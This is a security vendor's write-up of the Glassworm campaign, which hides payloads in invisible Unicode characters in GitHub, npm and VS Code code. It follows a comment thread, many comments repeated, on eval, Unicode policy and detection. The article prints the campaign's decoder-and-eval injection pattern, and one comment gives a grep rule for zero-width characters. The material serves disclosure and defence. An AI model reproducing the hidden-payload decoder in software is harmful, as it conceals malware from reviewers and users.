Glassworm Is Back: A New Wave of Invisible Unicode Attacks Hits Repositories

IMO while the bar is high to say "it's the responsibility of the repository operator itself to guard against a certain class of attack" - I think this qualifies. The same way GitHub provides Secret Scanning [0], it should alert upon spans of zero-width characters that are not used in a linguistically standard way (don't need an LLM for this, just n-tuples).

Sure, third-party services like the OP can provide bots that can scan. But if you create an ecosystem in which PRs can be submitted by threat actors, part of your commitment to the community should be to provide visibility into attacks that cannot be seen by the naked eye, and make that protection the norm rather than the exception.

[0] https://docs.github.com/en/get-started/learning-about-github...

I use non-Unicode mode in the terminal emulator (and text editors, etc), I use a non-Unicode locale, and will always use ASCII for most kind of source code files (mainly C) (in some cases, other character sets will be used such as PC character set, but usually it will be ASCII). Doing this will mitigate many of this when maintaining your own software. I am apparently not the only one; I have seen others suggest similar things. (If you need non-ASCII text (e.g. for documentation) you might store them in separate files instead. If you only need a small number of them in a few string literals, then you might use the \x escapes; add comments if necessary to explain it.)

The article is about in JavaScript, although it can apply to other programming languages as well. However, even in JavaScript, you can use \u escapes in place of the non-ASCII characters. (One of my ideas in a programming language design intended to be better instead of C, is that it forces visible ASCII (and a few control characters, with some restrictions on their use), unless you specify by a directive or switch that you want to allow non-ASCII bytes.)

It baffles me that any maintainer would merge code like the one highlighted in the issue, without knowing what it does. That’s regardless of being or not being able to see the “invisible” characters. There’s a transforming function here and an eval() call.

The mere fact that a software maintainer would merge code without knowing what it does says more about the terrible state of software.

The `eval` alone should be enough of a red flag

I feel like the threat of this type of thing is really overstated.

Sure the payload is invisible (although tbh im surprised it is. PUA characters usually show up as boxes with hexcodes for me), but the part where you put an "empty" string through eval isn't.

If you are not reviewing your code enough to notice something as non sensical as eval() an empty string, would you really notice the non obfuscated payload either?

Unicode should be for visible characters. Invisible characters are an abomination. So are ways to hide text by using Unicode so-called "characters" to cause the cursor to go backwards.

Things that vanish on a printout should not be in Unicode.

Remove them from Unicode.

Their button animations almost "crash" Firefox mobile. As soon as I reach them the entire page scrolls at single digit FPS.

Looks like the repo owner force-pushed a bad commit to replace an existing one. But then, why not forge it to maintain the existing timestamp + author, e.g. via `git commit --amend -C df8c18`?

Innocuous PR (but do note the line about "pedronauck pushed a commit that referenced this pull request last week"): https://github.com/pedronauck/reworm/pull/28

Original commit: https://github.com/pedronauck/reworm/commit/df8c18

Amended commit: https://github.com/pedronauck/reworm/commit/d50cd8

Either way, pretty clear sign that the owner's creds (and possibly an entire machine) are compromised.

Attacks employing invisible characters are not a new thing. Prior efforts here include terminal escape sequences, possibly hidden with CSS that if blindly copied and pasted would execute who knows what if the particular terminal allowed escape sequences to do too much (a common feature of featuritis) or the terminal had errors in its invisible character parsing code.

For data or code hiding the Acme::Bleach Perl module is an old example though by no means the oldest example of such. This is largely irrelevant given how relevant not learning from history is for most.

Invisible characters may also cause hard to debug issues, such as lpr(1) not working for a user, who turned out to have a control character hiding in their .cshrc. Such things as hex viewers and OCD levels of attention to detail are suggested.

Why didn't some make av rule to find stuff like this, they are just plain text files

I wonder if this could be used for prompt injection, if you copy and paste the seemingly empty string into an LLM does it understand? Maybe the affect Unicode characters aren’t tokenized.

Why can't code editors have a default-on feature where they show any invisible character (other than newlines)? I seem to remember Sublime doing this at least in some cases... the characters were rendered as a lozenge shape with the hex value of the character.

Is there ever a circumstance where the invisible characters are both legitimate and you as a software developer wouldn't want to see them in the source code?

eval() used to be evil....

Are people using eval() in production code?

Back in time I was on hacking forums where lot of script kiddies used to make malicious code.

I am wondering how that they've LLM, are people using them for making new kind of malicious codes more sophisticated than before?

I don't have to worry about any of this.

My clawbot & other AI agents already have this figured out.

The mere fact that a software maintainer would merge code without knowing what it does says more about the terrible state of software.

I feel like the threat of this type of thing is really overstated.

Sure the payload is invisible (although tbh im surprised it is. PUA characters usually show up as boxes with hexcodes for me), but the part where you put an "empty" string through eval isn't.

If you are not reviewing your code enough to notice something as non sensical as eval() an empty string, would you really notice the non obfuscated payload either?

Is there ever a circumstance where the invisible characters are both legitimate and you as a software developer wouldn't want to see them in the source code?

I wonder if this could be used for prompt injection, if you copy and paste the seemingly empty string into an LLM does it understand? Maybe the affect Unicode characters aren’t tokenized.

Their button animations almost "crash" Firefox mobile. As soon as I reach them the entire page scrolls at single digit FPS.

[0] https://docs.github.com/en/get-started/learning-about-github...

Regardless of the thorny question of whether it's Github's responsibility, it sure would be a good thing for them to do ASAP.

I think a "force visible ASCII for files whose names match a specific pattern" mode would be a simple thing to help. (You might be able to use the "encoding" command in the .gitattributes file for this, although I don't know if this would cause errors or warnings to be reported, and it might depend on the implementation.)

The `eval` alone should be enough of a red flag

Looks like the repo owner force-pushed a bad commit to replace an existing one. But then, why not forge it to maintain the existing timestamp + author, e.g. via `git commit --amend -C df8c18`?

Innocuous PR (but do note the line about "pedronauck pushed a commit that referenced this pull request last week"): https://github.com/pedronauck/reworm/pull/28

Original commit: https://github.com/pedronauck/reworm/commit/df8c18

Amended commit: https://github.com/pedronauck/reworm/commit/d50cd8

Either way, pretty clear sign that the owner's creds (and possibly an entire machine) are compromised.

Why didn't some make av rule to find stuff like this, they are just plain text files

Back in time I was on hacking forums where lot of script kiddies used to make malicious code.

I am wondering how that they've LLM, are people using them for making new kind of malicious codes more sophisticated than before?

Unicode should be for visible characters. Invisible characters are an abomination. So are ways to hide text by using Unicode so-called "characters" to cause the cursor to go backwards.

Things that vanish on a printout should not be in Unicode.

Remove them from Unicode.

I don't have to worry about any of this.

My clawbot & other AI agents already have this figured out.

eval() used to be evil....

Are people using eval() in production code?

Yeah, I would have loved to see an example where it was not obvious that there is an exploit. Where it would be possible for a reviewer to actually miss it.

I'm not a JS person, but taking the line at face value shouldn't it to nothing? Which, if I understand correctly, should never be merged. Why would you merge no-ops?

The value of the technique, I suppose, is that it hides a large payload a bit better. The part you can see stinks (a bunch of magic numbers and eval), but I suppose it’s still easier to overlook than a 9000-character line of hexadecimal (if still encoded or even decoded but still encrypted) or stuff mentioning Solana and Russian timezones (I just decoded and decrypted the payload out of curiosity).

But really, it still has to be injected after the fact. Even the most superficial code review should catch it.

The rule must be very simple: any occurrence of `eval()` should be a BIG RED FLAG. It should be handled like a live bomb, which it is.

Then, any appearance of unprintable characters should also be flagged. There are rather few legitimate uses of some zero-width characters, like ZWJ in emoji composition. Ideally all such characters should be inserted as \xNNNN escape sequences, and not literal characters.

Simple lint rules would suffice for that, with zero AI involvement.

Yeah it would have been nice to end with "and here's a five-line shell script to check if your project is likely affected". But to their credit, they do have an open-source tool [1], I'm just not willing to install a big blob of JavaScript to look for vulns in my other big blobs of JavaScript

[1] https://github.com/AikidoSec/safe-chain

Isn't that what this article is about? Advertising an av rule in their product that catches this.

In this case LLMs were obviously used to dress the code up as more legitimate, adding more human or project relevant noise. It's social engineering, but you leave the tedious bits to an LLM. The sophisticated part is the obscurity in the whole process, not the code.

Unicode is "designed to support the use of text in all of the world's writing systems that can be digitized"

Unicode needs tab, space, form feed, and carriage return.

Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.

Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.

Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.

Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.

Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.

That ship has sailed, but I consider Unicode a good thing, yet I consider it problematic to support Unicode in every domain.

I should be able to use Ü as a cursed smiley in text, and many more writing systems supported by Unicode support even more funny things. That's a good thing.

On the other hand, if technical and display file names (to GUI users) were separate, my need for crazy characters in file names, code bases and such are very limited. Lower ASCII for actual file names consumed by technical people is sufficient to me.

So we need a new standard problem due to the complexity of the last standard? Isn't unicode supposed to be a superset of ASCII, which already has control characters like new space, CR, and new lines? xD

So you'd remove space and tab from Unicode?

Another dum dum Unicode idea is having multiple code points with identical glyphs.

Rule of thumb: two Unicode sequences that look identical when printed should consist of the same code points.

greatidea,whoneedsspacesanyway

Good luck with that given there are invisible characters in ascii.

Also this attack doesnt seem to use invisible characters just characters that dont have an assigned meaning.

Invisible characters are there for visible characters to be printed correctly...

>Remove them from Unicode.

Do you honestly think this is a workable solution?

Regardless of the thorny question of whether it's Github's responsibility, it sure would be a good thing for them to do ASAP.

Here's the big reason GitHub should do it:

  It makes the product better

I know people love to talk money and costs and "value", but HN is a space for developers, not the business people. Our primary concern, as developers, is to make the product better. The business people need us to make the product better, keep the company growing, and beat out the competition. We need them to keep us from fixating on things that are useful but low priority and ensuring we keep having money. The contention between us is good, it keeps balance. It even ensures things keep getting better even if an effective monopoly forms as they still need us, the developers, to make the company continue growing (look at monopolies people aren't angry at and how they're different). And they need us more than we need them.

So I'd argue it's the responsibility of the developers, hired by GitHub, to create this feature because it makes the product better. Because that's the thing you've been hired for: to make the product better. Your concern isn't about the money, your concern is about the product. That's what you're hired for.

It absolutely is. They are simply spreading malware. You can't claim to be a 'dumb pipe' when your whole reason for existence is to make something people deemed 'too complex' simple enough for others to use, then you have an immediate responsibility to not only reduce complexity but to also ensure safety. Dumbing stuff down comes with a duty of care.

Yeah, I would have loved to see an example where it was not obvious that there is an exploit. Where it would be possible for a reviewer to actually miss it.

I'm not a JS person, but taking the line at face value shouldn't it to nothing? Which, if I understand correctly, should never be merged. Why would you merge no-ops?

Isn't that what this article is about? Advertising an av rule in their product that catches this.

That ship has sailed, but I consider Unicode a good thing, yet I consider it problematic to support Unicode in every domain.

I should be able to use Ü as a cursed smiley in text, and many more writing systems supported by Unicode support even more funny things. That's a good thing.

>Remove them from Unicode.

Do you honestly think this is a workable solution?

Yes, absolutely. See my other replies.

OWASP disagrees: See https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Securi..., listing `eval()` first in its small list of examples of "JavaScript functions that are dangerous and should only be used where necessary or unavoidable". I'm unaware of any such uses, myself. I can't think of any scenario where I couldn't get what I wanted by using some combination of `vm`, the `Function` constructor, and a safe wrapper around `JSON.parse()` to do anything I might have considered doing unsafely with `eval()`. Yes, `eval()` is a blatant red flag and definitely should be avoided.

The parent didn't say "there's no legitimate uses of eval", they said "using eval should make people pay more attention." A red flag is a warning. An alert. Not a signal saying "this is 100% no doubt malicious code."

Yes, it's a red flag. Yes, there's legitimate uses. Yes, you should always interrogate evals more closely. All these are true

While there are valid use cases for eval they are so rare that it should be disabled by default and strongly discouraged as a pattern. Only in very rare cases is eval the right choice and even then it will be fraught with risk.

When is an eval not at least a security "code smell"?

It really is. There are very few proper use-cases for eval.

But really, it still has to be injected after the fact. Even the most superficial code review should catch it.

Agreed on all those fronts. I'm just dismayed by all the comments suggesting that maintainers just merged PRs with this trojan, when the attack vector implies a more mundane form of credential compromise (and not, as the article implies, AI being used to sneak malicious changes past code review at scale).

[1] https://github.com/AikidoSec/safe-chain

The rule must be very simple: any occurrence of `eval()` should be a BIG RED FLAG. It should be handled like a live bomb, which it is.

Simple lint rules would suffice for that, with zero AI involvement.

Unicode is "designed to support the use of text in all of the world's writing systems that can be digitized"

Unicode needs tab, space, form feed, and carriage return.

Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.

Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.

Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.

Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.

Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.

So you'd remove space and tab from Unicode?

Good luck with that given there are invisible characters in ascii.

Also this attack doesnt seem to use invisible characters just characters that dont have an assigned meaning.

Something like this should work, assuming your encoding is Unicode (normally UTF-8), which grep would interpret:

  grep -P '[\x{200B}\x{200C}\x{200D}\x{FEFF}]' code.ts

See https://stackoverflow.com/q/78129129/223424

> There are rather few legitimate uses of some zero-width characters, like ZWJ in emoji composition.

Emojis are another abomination that should be removed from Unicode. If you want pictures, use a gif.

I think there’s debate (which I don’t want to participate in) over whether or not invisible characters have their uses in Unicode. But I hope we can all agree that invisible characters have no business in code, and banishing them is reasonable.

In our repos, we have some basic stuff like ruff that runs, and that includes a hard error on any Unicode characters. We mostly did this after some un-fun times when byte order marks somehow ended up in a file and it made something fail.

I have considered allowing a short list that does not include emojis, joining characters, and so on - basically just currency symbols, accent marks, and everything else you'd find in CP-1521 but never got around to it.

> Unicode needs tab, space, form feed, and carriage return.

Those are legacied in with ASCII. And only space and newline are needed. Before I check in code to git, I run a program that removes the tabs and linefeeds.

> Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.

!!tfel ot thgir ,am ,kooL

> Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.

I don't believe it.

> Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.

Not needed.

> Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.

How on earth did people read printed matter without that?

> Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.

Somehow people didn't need invisible characters when printing books.

The only ones people use any more are newline and space. A tab key is fine in your editor, but it's been more or less abandoned as a character. I haven't used a form feed character since the 1970s.

Invisible characters are there for visible characters to be printed correctly...

I'll grant that a space and a newline are necessary. The rest, nope.

greatidea,whoneedsspacesanyway

Spaces appear on a printout.

Another dum dum Unicode idea is having multiple code points with identical glyphs.

Rule of thumb: two Unicode sequences that look identical when printed should consist of the same code points.

If anything, Unicode should have had more disambiguated characters. Han unification was a mistake, and lower case dotted Turkish i and upper case dotless Turkish I should exist so that toUpper and toLower didn't need to know/guess at a locale to work correctly.

So you think that the letters in the Greek and Cyrillic alphabets which are printed identically to the Latin A should not exist?

And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?

As far as I know, glyphs are determined by the font and rendering engine. They're not in the Unicode standard.

I don't think that would help much. There are also characters which are similar but not the same and I don't think humans can spot the differences unless they are actively looking for them which most of the time people are not. If only one of two glyphs which are similar appear in the text nobody would likely notice, expectation bias will fuck you over.

Here's the big reason GitHub should do it:

  It makes the product better

I'd say that this is also true from a money-and-costs-and-value perspective. Sure, all press is good press... but any number of stakeholders would agree that "we got some mindshare by proactively protecting against an emerging threat" is higher-ROI press than "Ars did a piece on how widespread this problem is, and we're mentioned in the context of our interface making the attack hard to detect."

And when the incremental cost to build a feature is low in an age of agentic AI, there should be no barrier to a member of the technical staff (and hopefully they're not divided into devs/test/PM like in decades past) putting a prototype together for this.

Tldr: Yeah it would make it better!

Yes, absolutely. See my other replies.

Yes, it's a red flag. Yes, there's legitimate uses. Yes, you should always interrogate evals more closely. All these are true

When is an eval not at least a security "code smell"?

Something like this should work, assuming your encoding is Unicode (normally UTF-8), which grep would interpret:

  grep -P '[\x{200B}\x{200C}\x{200D}\x{FEFF}]' code.ts

See https://stackoverflow.com/q/78129129/223424

The only ones people use any more are newline and space. A tab key is fine in your editor, but it's been more or less abandoned as a character. I haven't used a form feed character since the 1970s.

It really is. There are very few proper use-cases for eval.

For a long time the standard way of loading JSON was using eval.

Yeah, the attack vector seems to be stolen credentials. I would be much more interested in an attack which actually uses Invisible characters as the main vector.

> There are rather few legitimate uses of some zero-width characters, like ZWJ in emoji composition.

Emojis are another abomination that should be removed from Unicode. If you want pictures, use a gif.

> Unicode needs tab, space, form feed, and carriage return.

Those are legacied in with ASCII. And only space and newline are needed. Before I check in code to git, I run a program that removes the tabs and linefeeds.

> Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.

!!tfel ot thgir ,am ,kooL

> Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.

I don't believe it.

> Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.

Not needed.

> Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.

How on earth did people read printed matter without that?

> Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.

Somehow people didn't need invisible characters when printing books.

Arguably them being in Unicode is an accessibility issue, unless we thought to standardize GIF names, and then that already sounds a lot like Unicode.

That's a very narrow view of the world. One example: In the past I have handled bilingual english-arabic files with switches within the same line and Arabic is written from left to right.

There are also languages that are written from to to bottom.

Unicode is not exclusively for coding, to the contrary, pretty sure it's only a small fraction of how Unicode is used.

> Somehow people didn't need invisible characters when printing books.

They didn't need computers either so "was seemingly not needed in the past" is not a good argument.

The fact is that there were so many character sets in use before Unicode because all these things were needed or at least wanted by a lot of people. Here's a great blog post by Nikita Prokopov about it: https://tonsky.me/blog/unicode/

    Look Ma
    xt! N !
    e tee S
    T larip

(No Unicode needed.)

Unicode is for human beings, not machines.

Spaces appear on a printout.

I'll grant that a space and a newline are necessary. The rest, nope.

You're talking about a subset of ASCII then. Unicode is supposed to support different languages and advanced typography, for which those characters are necessary. You can't write e.g. Arabic or Hebrew without those "unnecessary" invisible characters.

As far as I know, glyphs are determined by the font and rendering engine. They're not in the Unicode standard.

I wonder how anybody got by with printed books.

So you think that the letters in the Greek and Cyrillic alphabets which are printed identically to the Latin A should not exist?

And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?

> So you think that the letters in the Greek and Cyrillic alphabets which are printed identically to the Latin A should not exist?

Yes. Unicode should not be about semantic meaning, it should be about the visual. Like text in a book.

> And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?

Yup. Consider a printed book. How can you tell if a letter is a Greek letter or a Latin letter?

Those Unicode homonyms are a solution looking for a problem.

What about numbers? Would they be assigned to arabic only? I guess someone will be offended by that.

While at it we could also unify I, | and l. It's too confusing sometimes.

Yeah, the attack vector seems to be stolen credentials. I would be much more interested in an attack which actually uses Invisible characters as the main vector.

For a long time the standard way of loading JSON was using eval.

Not that long, browsers implemented JSON.parse() back in 2009. JSON was only invented back in 2001 and took a while to become popular. It was a very short window more than a decade ago when eval made sense here.

Eval for json also lead to other security issues like XSSI.

And why do we not anymore make use of it, but instead implemented separate JSON loading functionality in JavaScript? Can you think of any reasons beyond performance?

Arguably them being in Unicode is an accessibility issue, unless we thought to standardize GIF names, and then that already sounds a lot like Unicode.

How is it an accessibility issue? HTML allows things like little gif files. I've done this myself when I wrote text that contained Egyptian hieroglyphs. It works just fine!

That's a very narrow view of the world. One example: In the past I have handled bilingual english-arabic files with switches within the same line and Arabic is written from left to right.

There are also languages that are written from to to bottom.

Unicode is not exclusively for coding, to the contrary, pretty sure it's only a small fraction of how Unicode is used.

> Somehow people didn't need invisible characters when printing books.

They didn't need computers either so "was seemingly not needed in the past" is not a good argument.

    Look Ma
    xt! N !
    e tee S
    T larip

(No Unicode needed.)

Unicode is for human beings, not machines.

I wonder how anybody got by with printed books.

What about numbers? Would they be assigned to arabic only? I guess someone will be offended by that.

While at it we could also unify I, | and l. It's too confusing sometimes.

> So you think that the letters in the Greek and Cyrillic alphabets which are printed identically to the Latin A should not exist?

Yes. Unicode should not be about semantic meaning, it should be about the visual. Like text in a book.

> And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?

Yup. Consider a printed book. How can you tell if a letter is a Greek letter or a Latin letter?

Those Unicode homonyms are a solution looking for a problem.

> Yes. Unicode should not be about semantic meaning, it should be about the visual. Like text in a book.

Do you think 1, l and I should be encoded as the same character, or does this logic only extend to characters pesky foreigners use.

Unicode is about semantics not appearance. If you don't need semantics then use something different.

>Yup. Consider a printed book. How can you tell if a letter is a Greek letter or a Latin letter?

I can absolutely tell Cyrillic k from the lating к and latin u from the Cyrillic и.

>should not be about semantic meaning,

It's always better to be able to preserve more information in a text and not less.

Eval for json also lead to other security issues like XSSI.

Tldr: Yeah it would make it better!

I hope I left the lead as the lead.

But I also think we've had a culture shift that's hurting our field. Where engineers are arguing about if we should implement certain features based on the monetary value (which are all fictional anyways). But that's not our job. At best, it's the job of the engineering manager to convince the business people that it has not only utility value, but monetary.

And why do we not anymore make use of it, but instead implemented separate JSON loading functionality in JavaScript? Can you think of any reasons beyond performance?

I'd be surprised if there is a performance benefit of processing json with eval(). Browsers optimize the heck out of JSON.

Why did you opt in for such a comment while a straight forward response without belittling tone would have achieved the same?

How is it an accessibility issue? HTML allows things like little gif files. I've done this myself when I wrote text that contained Egyptian hieroglyphs. It works just fine!

I mean if you don't have sight.

Unicode is about semantics not appearance. If you don't need semantics then use something different.

> Yes. Unicode should not be about semantic meaning, it should be about the visual. Like text in a book.

Do you think 1, l and I should be encoded as the same character, or does this logic only extend to characters pesky foreigners use.

>Yup. Consider a printed book. How can you tell if a letter is a Greek letter or a Latin letter?

I can absolutely tell Cyrillic k from the lating к and latin u from the Cyrillic и.

>should not be about semantic meaning,

It's always better to be able to preserve more information in a text and not less.

I hope I left the lead as the lead.

I'd be surprised if there is a performance benefit of processing json with eval(). Browsers optimize the heck out of JSON.

Why did you opt in for such a comment while a straight forward response without belittling tone would have achieved the same?

I actually gave it some thought. I had written the actual reason first, but I realized that the person I was responding to must know this, yet keeps arguing in that eval is just fine.

I would say they are arguing that in bad faith, so I wanted to enter a dialogue where they are either forced to agree, or more likely, not respond at all.

I mean if you don't have sight.

Then use words. Or tooltips (HTML supports that). I use tooltips on my web pages to support accessibility for screen readers. Unicode should not be attempting to badly reinvent HTML.

I actually gave it some thought. I had written the actual reason first, but I realized that the person I was responding to must know this, yet keeps arguing in that eval is just fine.

I would say they are arguing that in bad faith, so I wanted to enter a dialogue where they are either forced to agree, or more likely, not respond at all.

Then use words. Or tooltips (HTML supports that). I use tooltips on my web pages to support accessibility for screen readers. Unicode should not be attempting to badly reinvent HTML.

The invisible threat we've been tracking for nearly a year is back. While the PolinRider campaign has been making headlines for compromising hundreds of GitHub repositories, we are separately seeing a new wave of Glassworm activity hitting GitHub, npm, and VS Code.

In October last year, we wrote about how hidden Unicode characters were being used to compromise GitHub repositories, tracing the technique back to a threat actor named Glassworm. This month, the same actor is back, and among the affected repositories are some notable names: a repo from Wasmer, Reworm, and opencode-bench from anomalyco, the organization behind OpenCode and SST.

A Year of the Invisible Code Campaign

March 2025: Aikido first discovers malicious npm packages hiding payloads using PUA Unicode characters
May 2025: We publish a blog detailing the risks of invisible Unicode and how it can be abused in supply chain attacks
October 17, 2025: We uncover compromised extensions on Open VSX using the same technique
October 31, 2025: We discover that the attackers have shifted focus to GitHub repositories
March 2026: A new mass wave emerges: hundreds of GitHub repositories compromised, with npm and VS Code also affected.

A Quick Refresher

Before diving into the scale of this new wave, let’s recap how this attack works. Even after months of coverage, it continues to catch developers and tooling off guard.

The trick relies on invisible Unicode characters: code snippets that are rendered as nothing in virtually every editor, terminal, and code review interface. Attackers use these invisible characters to encode a payload directly inside what appears to be an empty string. When the JavaScript runtime encounters it, a small decoder extracts the real bytes and passes them to eval().

Here's what the injection looks like. Remember, the apparent gap in the empty backticks below is anything but empty:

const s = v => [...v].map(w => (
  w = w.codePointAt(0),
  w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
  w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);


eval(Buffer.from(s(``)).toString('utf-8'));

The backtick string passed to s() looks empty in every viewer, but it's packed with invisible characters that, once decoded, produce a full malicious payload. In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.

The Scale of the March 2026 Wave

We are observing a mass campaign by the Glassworm threat actor spreading across open source repositories. A GitHub code search for the decoder pattern currently returns at least 151 matching repositories, and that number understates the true scope, since many affected repositories have already been deleted by the time of writing. The GitHub compromises appear to have taken place between March 3 and March 9.

The campaign has also expanded beyond GitHub. We are now seeing the same technique deployed in npm and the VS Code marketplace, suggesting Glassworm is operating a coordinated, multi-ecosystem push. This is consistent with the group's historical pattern of pivoting between registries.

Package	Ecosystem	Versions	Date
`@aifabrix/miso-client`	npm	4.7.2	Mar 12, 2026
`@iflow-mcp/watercrawl-watercrawl-mcp`	npm	1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4	Mar 12, 2026
`quartz.quartz-markdown-editor`	VS Code	0.3.0	Mar 12, 2026

Notable Compromised Repositories on GitHub

Among the repositories we identified, several belong to well-known projects with meaningful star counts, making them high-value targets for downstream supply chain impact:

Repository	Stars
pedronauck/reworm	1,460
pedronauck/spacefold	62
anomalyco/opencode-bench	56
doczjs/docz-plugin-css	39
uknfire/theGreatFilter	38
sillyva/rpg-schedule	37
wasmer-examples/hono-wasmer-starter	8

AI-Assisted Camouflage

As we noted in our October article, the malicious injections don't arrive in obviously suspicious commits. The surrounding changes are realistic: documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project.

This level of project-specific tailoring strongly suggests the attackers are using large language models to generate convincing cover commits. At the scale we're now seeing, manual crafting of 151+ bespoke code changes across different codebases simply isn't feasible.

Detection and Protection

Invisible threats require active defenses. You cannot rely on visual code review or standard linting to catch what you cannot see. At Aikido, we've built detection for invisible Unicode injection directly into our malware scanning pipeline.

If you already use Aikido, these packages would be flagged in your feed as a 100/100 critical finding.

Not on Aikido yet? Create a free account and link your repositories. The free plan includes our malware detection coverage (no credit card required).

Finally, a tool that can stop supply-chain malware in real time as they appear can prevent a serious infection. This is the idea behind Aikido Safe Chain, a free and open-source tool that wraps around npm, npx, yarn, pnpm, and pnpx and uses both AI and human malware researchers to detect and block the latest supply chain risks before they enter your environment.

‍

Hacker Times